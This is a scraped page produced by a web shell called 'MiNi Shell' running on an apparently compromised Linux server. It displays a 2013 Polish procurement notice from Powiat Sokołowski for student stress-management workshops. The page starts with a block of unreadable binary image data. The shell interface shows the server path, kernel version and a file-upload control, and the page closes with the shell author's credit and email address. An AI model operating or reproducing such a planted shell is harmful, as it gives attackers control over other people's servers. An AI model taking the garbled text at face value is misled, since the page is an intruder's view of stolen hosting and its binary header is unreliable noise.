JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130507/179728-N-2013.html

<p class="kh_header"><b>Sokołów Podlaski: Zorganizowanie warsztatów Radzenie sobie ze stresem w ramach projektu 
Wsparcie wdrażania Planu Rozwoju Zespołu Szkół Nr 1 im. K.K. Baczyńskiego 
w Sokołowie Podlaskim realizowanego przez Powiat Sokołowski, współfinansowanego 
ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 179728 - 2013; data zamieszczenia: 07.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Sokołowski reprezentowany przez Zarząd Powiatu w Sokołowie Podlaskim , ul. Wolności 23, 08-300 Sokołów Podlaski, woj. mazowieckie, tel. (025) 7817400, faks (025) 7817460.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-sokolowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie warsztatów Radzenie sobie ze stresem w ramach projektu 
Wsparcie wdrażania Planu Rozwoju Zespołu Szkół Nr 1 im. K.K. Baczyńskiego 
w Sokołowie Podlaskim realizowanego przez Powiat Sokołowski, współfinansowanego 
ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z części A, B i C
Część A zamówienia:
Opracowanie programu szkolenia w formie pakietu, które zostaną przekazane Zamawiającemu w wersji elektronicznej i papierowej na temat:
Techniki radzenia sobie ze stresem
Program szkolenia i materiały szkoleniowe winny uzyskać akceptację Koordynatora Projektu.
Wykonawca wykona usługę w części A zamówienia do 31 maja 2013 r.

Program szkolenia: Techniki radzenia sobie ze stresem
Wzór, według jakiego ma zostać opracowany program.

Nazwa szkolenia: Techniki radzenia sobie ze stresem 
Rodzaj szkolenia: warsztaty
Czas trwania i sposób organizacji: 15 godz. dydaktycznych
Cele kształcenia:
Cel ogólny:
Cele szczegółowe:
Wykaz nabytych umiejętności nabytych w trakcie szkolenia:
Po ukończeniu modułu szkolenia uczestnik:
Harmonogram:
TEMAT
LICZBA GODZIN
W.
ĆW.
Opis form, metod i środków dydaktycznych:
Wykaz zalecanej literatury przedmiotu:

Część B zamówienia:

1. Zorganizowanie i przeprowadzenie szkolenia (pełna organizacja warsztatów czyli: przejazd, nocleg, materiały warsztatowe,  pełne posiłki, zorganizowanie czasu wolnego)  w zakresie Techniki radzenia sobie ze stresem w ramach projektu Wsparcie wdrażania Planu Rozwoju Zespołu Szkół Nr 1 im. K.K. Baczyńskiego w Sokołowie Podlaskim realizowanego przez Powiat Sokołowski, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w 6 grupach po 20-25 osób w grupie (łącznie 128 osób) ( każda grupa odbywa zajęcia w piątek i sobotę poza miejscem nauki czyli poza Sokołowem Podlaskim w odległości do 60 km od Sokołowa Podlaskiego) 
Kwota jaką należy podać w Formularzu ofertowym ma dotyczyć całego zamówienia bez podziału na osobę. Należy podać łączną cenę wykonania zlecenia. 

2. Od prowadzących szkolenie wymaga się:
odpowiedniej wiedzy i doświadczenia w pracy warsztatowej z osobami dorosłymi i dziećmi (wymaga się poświadczenia stosownymi dokumentami)
doświadczenie w pracy w projektach unijnych (wymaga się poświadczenia stosownymi dokumentami)
min. 5 letnie doświadczenie zawodowe w pracy psychologa lub trenera(wymaga się poświadczenia stosownymi dokumentami)
merytorycznej znajomości programu szkolenia
organizacji zajęć zapewniających komfort pracy w grupie warsztatowej minimum 2 trenerów na każdą z 6 przewidzianych w projekcie grup
praktycznego przekazania wszystkich zawartych w programie szkolenia technik radzenia sobie ze stresem

Część C zamówienia: usługi hotelowe, gastronomiczne, sale konferencyjne i przejazd 128 uczniów w 6 grupach po 20-25 osób
Zamówienie w tym punkcie obejmuje:
Zakwaterowanie uczniów łącznie 128 osobo nocy w pokojach 2-osobowych (pojedyncze łóżka, w jednym pokoju muszą  zostać zakwaterowani uczniowie tej samej płci), ogrzanych do temperatury min. 20 C , z łazienką, WC, kabiną prysznicową lub wanną, ciepłą i zimną wodą przez całą dobę, odbiornikiem TV, koszem na śmieci. W pokojach powinna być ponadto zapewniona woda mineralna do picia w ilości 0,5 l na ucznia. 
Zakwaterowanie opiekunów łącznie 12 osobonocy (jak wynika z części C przedmiotu zamówienia w szkoleniu ma uczestniczyć ogółem 128 uczniów zorganizowanych w 6 grup każda licząca 20-25 osób. Zgodnie z obowiązującymi przepisami szkolnymi na 15 uczniów przypada 1 opiekun. Zatem przy 6 wyjazdach szkoleniowych obecnych będzie łącznie 12 opiekunów) w pokojach 2 osobowych, ogrzanych do temperatury min. 20 C , z łazienką, WC, kabiną prysznicową lub wanną, ciepłą i zimną wodą przez całą dobę, odbiornikiem TV, koszem na śmieci. W pokojach powinna być ponadto zapewniona woda mineralna do picia w ilości 0,5 l na opiekuna.
Wynajęcie minimum 2 sal szkoleniowych (podczas każdego wyjazdu) do przeprowadzenia zajęć warsztatowych, wyposażonych w tablicę typu flipchart oraz na życzenie prowadzących w sprzęt multimedialny (projektor oraz nagłośnienie), z dostępem do światła dziennego, z całodobowym dostępem do Internetu bezprzewodowego
Świadczenie usług gastronomicznych dla 128 uczniów i 12 opiekunów w tym:
I dnia - piątek: śniadanie lub przerwę kanapkową, obiad, poczęstunek w trakcie trwania zajęć, kolację z atrakcją wieczorną 
II dnia  - sobota: śniadanie, obiad oraz poczęstunek w trakcie trwania zajęć.
Wykonawca zapewni pełną ( zaspokajające potrzeby żywieniowe ) usługę gastronomiczną. 
Posiłki powinny zostać podane w formie bufetu szwedzkiego, w odrębnym pomieszczeniu niż szkolenie. Powinny być przygotowywane codziennie na miejscu, ze świeżych, dobrej jakości produktów przez wykwalifikowaną kadrę gastronomiczną.
Obiad powinien składać się z zupy, co najmniej 2 dań głównych do wyboru (mięsne i bezmięsne), 2 ciepłych dodatków do dań (np. ziemniaki, ryż, warzywa, gotowane) sałatki, deseru i pakietu napoi (herbata, woda, sok).
Kolacja powinna składać się z co najmniej: 2 gorących dań głównych, 2 przekąsek zimnych lub ciepłych, patery wędlin i serów żółtych, pieczywa i pakietu napoi (herbata, woda, sok).
Wykonawca zapewni minimum 2 poczęstunki w czasie przerw w zajęciach dydaktycznych każdego dnia, w skład których wchodzą: herbata, woda, sok oraz kruche ciastka.
Zapewnienie przejazdu uczniom i opiekunom spod siedziby Zamawiającego do miejsca, w którym odbywa się szkolenie z Technik radzenia sobie ze stresem.
Nie dopuszcza się przewozu uczniów każdorazowo z wykorzystaniem więcej niż jednego pojazdu. 
Od obiektu realizującego usługę hotelowo-gastronomiczną wymaga się ponadto:
czy spełnia warunki PKD - posiadania uprawnień do wykonywania określonej działalności lub czynności poświadczona aktualnym wypisem KRS w tym:
74,9  działalność agentów i pośredników turystycznych oraz organizatorów turystyki
85,5 pozaszkolne formy kształcenia 
85,6  działalność wspomagająca edukację
55,1 hotele i podobne obiekty zakwaterowania
55,2 obiekty noclegowe turystyczne i miejsca krótkotrwałego zakwaterowania        56,1 Restauracje i pozostałe placówki gastronomiczne
56,2 Przygotowywanie żywności dla odbiorców zewnętrznych (Katering) i pozostała gastronomiczna działalność usługowa
zaświadczeń o spełnieniu warunków bhp i popż - zapewnienia wymaganego standardu usług hotelarsko-gastronomicznych oraz przestrzegania obowiązujących przepisów sanitarnych, higienicznych, a także przeciwpożarowych  wymagane dołączenie stosownych dokumentów oraz aktualnych zaświadczeń: 
opracowana instrukcja bezpieczeństwa pożarowego wraz z wytyczonymi planami dróg i wyjść ewakuacyjnych
wyposażenie pomieszczeń sypialnych w automatyczne urządzenia sygnalizacji pożaru 
(proszę dołączyć zaświadczenie  potwierdzające ich sprawność techniczną)
całodobowy monitoring lokalnych systemów sygnalizacji pożaru z do najbliższej terytorialnie KOMENDY PAŃSTWOWEJ STRAŻY POŻARNEJ
ostatnia opinia straży pożarnej w tym: sprawność instalacji oświetlenia ewakuacyjnego oraz aktualny przegląd gaśnic pionowych przeciwpożarowych 
posiadania aktualnej polisy ubezpieczeniowej OC (wymagane dołączenie kserokopii polisy poświadczonej za zgodność z oryginałem) 
zapewnienie za darmo warunków do uprawiania czynnego wypoczynku na terenie obiektu
zapewnienia koordynatora, bezpośrednio odpowiedzialnego za usługę, kontakty i organizację warsztatów Techniki radzenia sobie ze stresem, a także sprawującego nadzór nad realizacją przedmiotu zamówienia zgodnie z zapisami SIWZ. 
Zamawiający nie dopuszcza możliwości zakwaterowania oraz wyżywienia uczniów poza terenem obiektu, w którym odbywają się zajęcia warsztatowe..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Od prowadzących szkolenie wymaga się odpowiedniej wiedzy i doświadczenia w pracy warsztatowej, znajomości programu szkolenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie aktualnej polisy ubezpieczeniowej OC</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. zaświadczenie o spełnieniu warunków bhp i popż,
2. zaświadczenie potwierdzające sprawność techniczną automatycznych urządzeń sygnalizacji pożaru w pomieszczeniach sypialnych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) zmiany terminu wykonania umowy w związku z przyczynami leżącymi po stronie Wykonawcy lecz przez Wykonawcę niezawinionymi, po ich uznaniu (akceptacji) przez Zamawiającego i wyrażeniu przez Zamawiającego zgody na zmianę terminu wykonania, nie później niż przed upływem terminu wykonania umowy wskazanego w § 3 umowy,
2) zmiany terminu wykonania umowy w sytuacji, gdyby Zamawiającemu nie udało się zrekrutować odpowiedniej liczby uczestników warsztatów,
3) zmiany wynagrodzenia brutto, o którym mowa w § 4 ust. 1, jeżeli w trakcie trwania umowy nastąpi zmiana przepisów w zakresie podatku VAT należnego od towarów i usług będących przedmiotem umowy,
4) nieistotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sokolowpodlaski.asi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 08-300 Sokołów Podlaski, ul. Wolności 23 pok. 303.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 15:00, miejsce: 08-300 Sokołów Podlaski, ul. Wolności 23 - biuro podawcze pok. 109 czynne w godz. 8.00-16.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskich w ramach Europejskiego Funduszu Społecznego. Działanie 9.2 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com